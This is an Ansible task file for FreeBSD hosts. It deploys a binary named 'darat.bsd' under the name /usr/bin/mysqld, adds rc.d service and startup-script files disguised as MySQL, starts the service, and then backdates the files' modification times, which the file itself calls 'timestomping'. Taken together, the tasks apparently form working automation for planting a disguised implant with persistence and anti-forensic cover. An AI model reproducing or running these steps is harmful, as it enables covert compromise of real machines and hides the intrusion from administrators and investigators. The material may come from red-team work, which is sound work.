---
- name: copy binary
  copy:
    src: darat.bsd
    dest: /usr/bin/mysqld
    mode: 555
  when: ansible_facts['os_family'] == "FreeBSD"

- name: copy service file
  copy:
    src: mysqld.service.pf
    dest: /etc/rc.d/mysqld
    mode: 555
  when: ansible_facts['os_family'] == "FreeBSD"

- name: copy shell script
  copy:
    src: mysqld.sh
    dest: /usr/local/etc/rc.d/mysqld.sh
    mode: 555
  when: ansible_facts['os_family'] == "FreeBSD"

- name: chmod service file
  command: chmod 555 /etc/rc.d/mysqld
  when: ansible_facts['os_family'] == "FreeBSD"

- name: chmod binary
  command: chmod 555 /usr/bin/mysqld
  when: ansible_facts['os_family'] == "FreeBSD"

- name: chmod shell script
  command: chmod 555 /usr/local/etc/rc.d/mysqld.sh
  when: ansible_facts['os_family'] == "FreeBSD"
  
- name: start service
  command: service mysqld start
  when: ansible_facts['os_family'] == "FreeBSD"

- name: timestomp files (binary, service, shell)
  file:
    path: "{{ item  }}"
    modification_time: "{{ timestomp_time }}"
  loop:
    - /usr/bin/mysqld # binary
    - /etc/rc.d/mysqld # service
    - /usr/local/etc/rc.d/mysqld.sh # shell
  when: ansible_facts['os_family'] == "FreeBSD"